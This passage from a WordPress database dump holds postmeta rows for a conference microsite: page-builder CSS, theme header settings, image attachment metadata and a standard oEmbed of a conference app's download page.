!important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36712,5415,'_wpb_shortcodes_custom_css_updated','1'),
(36713,5416,'_wpb_post_custom_layout','default'),
(36714,5416,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36715,5416,'_wpb_shortcodes_custom_css_updated','1'),
(36716,5420,'_wp_attached_file','2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg'),
(36717,5420,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:726;s:6:\"height\";i:1024;s:4:\"file\";s:55:\"2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\";s:8:\"filesize\";i:120441;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"QR-code-nposter2_Siavash_14May19-726x1024-1-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19327;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"QR-code-nposter2_Siavash_14May19-726x1024-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8285;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:55:\"QR-code-nposter2_Siavash_14May19-726x1024-1-500x705.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:705;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67981;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(36718,5417,'_edit_lock','1693086668:1'),
(36719,5417,'_edit_last','1'),
(36720,5417,'_wp_page_template','template-microsite.php'),
(36723,5417,'_wpb_vc_js_status','false'),
(36724,5417,'_dt_sidebar_position','disabled'),
(36725,5417,'_dt_sidebar_widgetarea_id','sidebar_1'),
(36726,5417,'_dt_sidebar_hide_on_mobile','0'),
(36727,5417,'_dt_footer_show','1'),
(36728,5417,'_dt_footer_widgetarea_id','sidebar_2'),
(36729,5417,'_dt_footer_hide_on_mobile','0'),
(36730,5417,'_dt_header_title','fancy'),
(36731,5417,'_dt_header_background','normal'),
(36732,5417,'_dt_header_background_below_slideshow','disabled'),
(36733,5417,'_dt_header_transparent_bg_color_scheme','light'),
(36734,5417,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(36735,5417,'_dt_header_transparent_top_bar_bg_opacity','25'),
(36736,5417,'_dt_header_transparent_bg_color','#000000'),
(36737,5417,'_dt_header_transparent_bg_opacity','50'),
(36738,5417,'_dt_header_disabled_background','normal'),
(36739,5417,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(36740,5417,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(36741,5417,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(36742,5417,'_dt_header_disabled_transparent_bg_color','#000000'),
(36743,5417,'_dt_header_disabled_transparent_bg_opacity','50'),
(36744,5417,'_dt_page_overrides_top_margin',''),
(36745,5417,'_dt_page_overrides_right_margin',''),
(36746,5417,'_dt_page_overrides_bottom_margin',''),
(36747,5417,'_dt_page_overrides_left_margin',''),
(36748,5417,'_dt_mobile_page_padding_top',''),
(36749,5417,'_dt_mobile_page_padding_right',''),
(36750,5417,'_dt_mobile_page_padding_bottom',''),
(36751,5417,'_dt_mobile_page_padding_left',''),
(36752,5417,'_dt_post_options_back_button',''),
(36753,5417,'_dt_post_options_hide_thumbnail','0'),
(36754,5417,'_dt_post_options_related_mode','same'),
(36755,5417,'_dt_post_options_preview','normal'),
(36756,5417,'_dt_microsite_primary_menu',''),
(36757,5417,'_dt_microsite_split_left_menu',''),
(36758,5417,'_dt_microsite_split_right_menu',''),
(36759,5417,'_dt_microsite_mobile_menu',''),
(36762,5417,'_dt_fancy_header_layout_heading',''),
(36763,5417,'_dt_fancy_header_title_aligment','center'),
(36764,5417,'_dt_fancy_header_height','300'),
(36765,5417,'_dt_fancy_header_padding-top','0px'),
(36766,5417,'_dt_fancy_header_padding-bottom','0px'),
(36767,5417,'_dt_fancy_header_breadcrumbs_heading',''),
(36768,5417,'_dt_fancy_header_breadcrumbs','disabled'),
(36769,5417,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(36770,5417,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(36771,5417,'_dt_fancy_header_title_heading',''),
(36772,5417,'_dt_fancy_header_title_mode','generic'),
(36773,5417,'_dt_fancy_header_title',''),
(36774,5417,'_dt_fancy_header_title_font_size','30'),
(36775,5417,'_dt_fancy_header_title_line_height','36'),
(36776,5417,'_dt_fancy_header_text_transform','none'),
(36777,5417,'_dt_fancy_header_title_color_mode','color'),
(36778,5417,'_dt_fancy_header_title_color','#ffffff'),
(36779,5417,'_dt_fancy_header_subtitle_heading',''),
(36780,5417,'_dt_fancy_header_subtitle',''),
(36781,5417,'_dt_fancy_header_subtitle_font_size','18'),
(36782,5417,'_dt_fancy_header_subtitle_line_height','26'),
(36783,5417,'_dt_fancy_header_subtitle_text_transform','none'),
(36784,5417,'_dt_fancy_header_subtitle_color_mode','color'),
(36785,5417,'_dt_fancy_header_subtitle_color','#ffffff'),
(36786,5417,'_dt_fancy_header_bg_heading',''),
(36787,5417,'_dt_fancy_header_bg_color','#222222'),
(36788,5417,'_dt_fancy_header_bg_image_origin','custom'),
(36789,5417,'_dt_fancy_header_bg_image','a:0:{}'),
(36790,5417,'_dt_fancy_header_bg_repeat','no-repeat'),
(36791,5417,'_dt_fancy_header_bg_position_x','center'),
(36792,5417,'_dt_fancy_header_bg_position_y','center'),
(36793,5417,'_dt_fancy_header_bg_fullscreen','1'),
(36794,5417,'_dt_fancy_header_bg_overlay','0'),
(36795,5417,'_dt_fancy_header_overlay_color','#000'),
(36796,5417,'_dt_fancy_header_bg_overlay_opacity','50'),
(36797,5417,'_dt_fancy_header_scroll_effect','default'),
(36798,5417,'_dt_fancy_header_bg_parallax','0.5'),
(36799,5417,'_dt_fancy_header_responsiveness_heading',''),
(36800,5417,'_dt_fancy_header_responsiveness','disabled'),
(36801,5417,'_dt_fancy_header_responsiveness_switch','778px'),
(36802,5417,'_dt_fancy_header_responsive_height','70'),
(36803,5417,'_dt_fancy_header_responsive_font_size','30'),
(36804,5417,'_dt_fancy_header_responsive_title_line_height','38'),
(36805,5417,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(36806,5417,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(36807,5417,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(36808,5417,'_dt_microsite_page_layout','wide'),
(36809,5417,'_dt_microsite_page_loading','enabled'),
(36810,5417,'_dt_microsite_logo_link',''),
(36811,5417,'main_logo_heading',''),
(36812,5417,'_dt_microsite_main_logo_type','default'),
(36813,5417,'_dt_microsite_main_logo_regular','a:0:{}'),
(36814,5417,'_dt_microsite_main_logo_hd','a:0:{}'),
(36815,5417,'transparent_logo_heading',''),
(36816,5417,'_dt_microsite_transparent_logo_type','default'),
(36817,5417,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(36818,5417,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(36819,5417,'mixed_logo_heading',''),
(36820,5417,'_dt_microsite_mixed_logo_type','default'),
(36821,5417,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(36822,5417,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(36823,5417,'mixed_transparent_logo_heading',''),
(36824,5417,'_dt_microsite_mixed_transparent_logo_type','default'),
(36825,5417,'_dt_microsite_mixed_transparent_logo_regular','a:0:{}'),
(36826,5417,'_dt_microsite_mixed_transparent_logo_hd','a:0:{}'),
(36827,5417,'floating_logo_heading',''),
(36828,5417,'_dt_microsite_floating_logo_type','default'),
(36829,5417,'_dt_microsite_floating_logo_regular','a:0:{}'),
(36830,5417,'_dt_microsite_floating_logo_hd','a:0:{}'),
(36831,5417,'_dt_microsite_mobile_logo_type','default'),
(36832,5417,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(36833,5417,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(36834,5417,'_dt_microsite_transparent_mobile_logo_type','default'),
(36835,5417,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(36836,5417,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(36837,5417,'bottom_logo_heading',''),
(36838,5417,'_dt_microsite_bottom_logo_type','default'),
(36839,5417,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(36840,5417,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(36841,5417,'favicon_heading',''),
(36842,5417,'_dt_microsite_favicon_type','default'),
(36843,5417,'_dt_microsite_favicon','a:0:{}'),
(36844,5417,'_dt_microsite_favicon_hd','a:0:{}'),
(36845,5417,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(36851,5417,'_oembed_cde3842e08d607ee5b7eed17010077a4','<blockquote class=\"wp-embedded-content\" data-secret=\"mr9gAmNJOM\"><a href=\"https://conference4me.psnc.pl/download/\">Download</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Download&#8221; &#8212; Conference4me | Mobile Conference Assistant\" src=\"https://conference4me.psnc.pl/download/embed/#?secret=jUAnPmyJAY#?secret=mr9gAmNJOM\" data-secret=\"mr9gAmNJOM\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),
(36852,5417,'_oembed_time_cde3842e08d607ee5b7eed17010077a4','1693085686'),
(36860,5430,'_edit_lock','1693198855:1'),
(36861,5430,'_edit_last','1'),
(36862,5433,'_wp_attached_file','2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg'),
(36863,5433,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:905;s:6:\"height\";i:1280;s:4:\"file\";s:48:\"2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\";s:8:\"filesize\";i:395012;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"b69e5201-9176-43d7-b10e-476efe69ecf1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23657;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"b69e5201-9176-43d7-b10e-476efe69ecf1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178877;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"b69e5201-9176-43d7-b10e-476efe69ecf1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9237;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"b69e5201-9176-43d7-b10e-476efe69ecf1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198388;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:48:\"b69e5201-9176-43d7-b10e-476efe69ecf1-500x707.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101913;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:49:\"b69e5201-9176-43d7-b10e-476efe69ecf1-800x1131.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:1131;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207977;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(36864,5430,'_wp_page_template','template-microsite.php'),
(36867,5430,'_wpb_vc_js_status','false'),
(36868,5430,'_dt_sidebar_position','disabled'),
(36869,5430,'_dt_sidebar_widgetarea_id','sidebar_1'),
(36870,5430,'_dt_sidebar_hide_on_mobile','0'),
(36871,5430,'_dt_footer_show','1'),
(36872,5430,'_dt_footer_widgetarea_id','sidebar_2'),
(36873,5430,'_dt_footer_hide_on_mobile','0'),
(36874,5430,'_dt_header_title','fancy'),
(36875,5430,'_dt_header_background','normal'),
(36876,5430,'_dt_header_background_below_slideshow','disabled'),
(36877,5430,'_dt_header_transparent_bg_color_scheme','light'),
(36878,5430,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(36879,5430,'_dt_header_transparent_top_bar_bg_opacity','25'),
(36880,5430,'_dt_header_transparent_bg_color','#000000'),
(36881,5430,'_dt_header_transparent_bg_opacity','50'),
(36882,5430,'_dt_header_disabled_background','normal'),
(36883,5430,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(36884,5430,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(36885,5430,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(36886,5430,'_dt_header_disabled_transparent_bg_color','#000000'),
(36887,5430,'_dt_header_disabled_transparent_bg_opacity','50'),
(36888,5430,'_dt_page_overrides_top_margin',''),
(36889,5430,'_dt_page_overrides_right_margin',''),
(36890,5430,'_dt_page_overrides_bottom_margin',''),
(36891,5430,'_dt_page_overrides_left_margin',''),
(36892,5430,'_dt_mobile_page_padding_top',''),
(36893,5430,'_dt_mobile_page_padding_right',''),
(36894,5430,'_dt_mobile_page_padding_bottom',''),
(36895,5430,'_dt_mobile_page_padding_left',''),
(36896,5430,'_dt_fancy_header_layout_heading',''),
(36897,5430,'_dt_fancy_header_title_aligment','center'),
(36898,5430,'_dt_fancy_header_height','300'),
(36899,5430,'_dt_fancy_header_padding-top','0px'),
(36900,5430,'_dt_fancy_header_padding-bottom','0px'),
(36901,5430,'_dt_fancy_header_breadcrumbs_heading',''),
(36902,5430,'_dt_fancy_header_breadcrumbs','disabled'),
(36903,5430,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(36904,5430,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(36905,5430,'_dt_fancy_header_title_heading',''),
(36906,5430,'_dt_fancy_header_title_mode','generic'),
(36907,5430,'_dt_fancy_header_title',''),
(36908,5430,'_dt_fancy_header_title_font_size','30'),
(36909,5430,'_dt_fancy_header_title_line_height','36'),
(36910,5430,'_dt_fancy_header_text_transform','none'),
(36911,5430,'_dt_fancy_header_title_color_mode','color'),
(36912,5430,'_dt_fancy_header_title_color','#ffffff'),
(36913,5430,'_dt_fancy_header_subtitle_heading',''),
(36914,5430,'_dt_fancy_header_subtitle',''),
(36915,5430,'_dt_fancy_header_subtitle_font_size','18'),
(36916,5430,'_dt_fancy_header_subtitle_line_height','26'),
(36917,5430,'_dt_fancy_header_subtitle_text_transform','none'),
(36918,5430,'_dt_fancy_header_subtitle_color_mode','color'),
(36919,5430,'_dt_fancy_header_subtitle_color','#ffffff'),
(36920,5430,'_dt_fancy_header_bg_heading',''),
(36921,5430,'_dt_fancy_header_bg_color','#222222'),
(36922,5430,'_dt_fancy_header_bg_image_origin','custom'),
(36923,5430,'_dt_fancy_header_bg_image','a:0:{}'),
(36924,5430,'_dt_fancy_header_bg_repeat','no-repeat'),
(36925,5430,'_dt_fancy_header_bg_position_x','center'),
(36926,5430,'_dt_fancy_header_bg_position_y','center'),
(36927,5430,'_dt_fancy_header_bg_fullscreen','1'),
(36928,5430,'_dt_fancy_header_bg_overlay','0'),
(36929,5430,'_dt_fancy_header_overlay_color','#000'),
(36930,5430,'_dt_fancy_header_bg_overlay_opacity','50'),
(36931,5430,'_dt_fancy_header_scroll_effect','default'),
(36932,5430,'_dt_fancy_header_bg_parallax','0.5'),
(36933,5430,'_dt_fancy_header_responsiveness_heading',''),
(36934,5430,'_dt_fancy_header_responsiveness','enabled'),
(36935,5430,'_dt_fancy_header_responsiveness_switch','778px'),
(36936,5430,'_dt_fancy_header_responsive_height','70'),
(36937,5430,'_dt_fancy_header_responsive_font_size','30'),
(36938,5430,'_dt_fancy_header_responsive_title_line_height','38'),
(36939,5430,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(36940,5430,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(36941,5430,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(36942,5430,'_dt_post_options_back_button',''),
(36943,5430,'_dt_post_options_hide_thumbnail','0'),
(36944,5430,'_dt_post_options_related_mode','same'),
(36945,5430,'_dt_post_options_preview','normal'),
(36946,5430,'_dt_microsite_page_layout','wide'),
(36947,5430,'_dt_microsite_page_loading','enabled'),
(36948,5430,'_dt_microsite_primary_menu',''),
(36949,5430,'_dt_microsite_split_left_menu',''),
(36950,5430,'_dt_microsite_split_right_menu',''),
(36951,5430,'_dt_microsite_mobile_menu',''),
(36952,5430,'_dt_microsite_logo_link',''),
(36953,5430,'main_logo_heading',''),
(36954,5430,'_dt_microsite_main_logo_type','default'),
(36955,5430,'_dt_microsite_main_logo_regular','a:0:{}'),
(36956,5430,'_dt_microsite_main_logo_hd','a:0:{}'),
(36957,5430,'transparent_logo_heading',''),
(36958,5430,'_dt_microsite_transparent_logo_type','default'),
(36959,5430,'_dt_microsite_transparent_logo_regular','a:0:{}'),
(36960,5430,'_dt_microsite_transparent_logo_hd','a:0:{}'),
(36961,5430,'mixed_logo_heading',''),
(36962,5430,'_dt_microsite_mixed_logo_type','default'),
(36963,5430,'_dt_microsite_mixed_logo_regular','a:0:{}'),
(36964,5430,'_dt_microsite_mixed_logo_hd','a:0:{}'),
(36965,5430,'mixed_transparent_logo_heading',''),
(36966,5430,'_dt_microsite_mixed_transparent_logo_type','default'),
(36967,5430,'_dt_microsite_mixed_transparent_logo_regular','a:0:{}'),
(36968,5430,'_dt_microsite_mixed_transparent_logo_hd','a:0:{}'),
(36969,5430,'floating_logo_heading',''),
(36970,5430,'_dt_microsite_floating_logo_type','default'),
(36971,5430,'_dt_microsite_floating_logo_regular','a:0:{}'),
(36972,5430,'_dt_microsite_floating_logo_hd','a:0:{}'),
(36973,5430,'_dt_microsite_mobile_logo_type','default'),
(36974,5430,'_dt_microsite_mobile_logo_regular','a:0:{}'),
(36975,5430,'_dt_microsite_mobile_logo_hd','a:0:{}'),
(36976,5430,'_dt_microsite_transparent_mobile_logo_type','default'),
(36977,5430,'_dt_microsite_transparent_mobile_logo_regular','a:0:{}'),
(36978,5430,'_dt_microsite_transparent_mobile_logo_hd','a:0:{}'),
(36979,5430,'bottom_logo_heading',''),
(36980,5430,'_dt_microsite_bottom_logo_type','default'),
(36981,5430,'_dt_microsite_bottom_logo_regular','a:0:{}'),
(36982,5430,'_dt_microsite_bottom_logo_hd','a:0:{}'),
(36983,5430,'favicon_heading',''),
(36984,5430,'_dt_microsite_favicon_type','default'),
(36985,5430,'_dt_microsite_favicon','a:0:{}'),
(36986,5430,'_dt_microsite_favicon_hd','a:0:{}'),
(36987,5430,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off 